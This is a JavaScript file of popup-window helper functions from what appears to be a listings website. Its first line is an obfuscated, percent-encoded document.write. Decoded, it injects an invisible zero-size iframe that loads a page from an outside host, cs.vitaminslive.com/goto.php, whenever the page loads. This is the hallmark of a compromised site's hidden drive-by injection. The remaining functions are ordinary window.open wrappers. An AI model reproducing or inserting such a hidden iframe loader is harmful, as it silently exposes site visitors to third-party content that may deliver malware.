document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%73%2e%76%69%74%61%6d%69%6e%73%6c%69%76%65%2e%63%6f%6d%2f%67%6f%74%6f%2e%70%68%70%27%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e"));
function listing(url) {
leftPos = 0
topPos = 0
listWindow = window.open(url, 'listing', 'scrollbars=yes,resizable=yes,width=550,height=400')
listWindow.focus()
}

function details(url) {
leftPos = 0
topPos = 0
popWindow = window.open(url, 'details', 'scrollbars=yes,resizable=yes,width=700,height=540')
popWindow.focus()
}

function phlist(url) {
phlistWindow = window.open(url, 'phlist', 'status=yes,scrollbars=yes,resizable=yes,width=500,height=600')
phlistWindow.focus()
}

function pop(url) {
popupWindow = window.open(url, 'pop', 'status=yes,scrollbars=yes,resizable=yes,width=350,height=500')
popupWindow.focus()
}

function phot(url) {
photWindow = window.open(url, 'phot', 'scrollbars=yes,status=yes,width=400,height=300')
photWindow.focus()
}

function card(url) {
cardWindow = window.open(url, 'card', 'scrollbars=yes,width=550,height=400')
cardWindow.focus()
}


function pref(url) {
prefWindow = window.open(url, 'pref', 'scrollbars=yes,width=550,height=400')
prefWindow.focus()
}


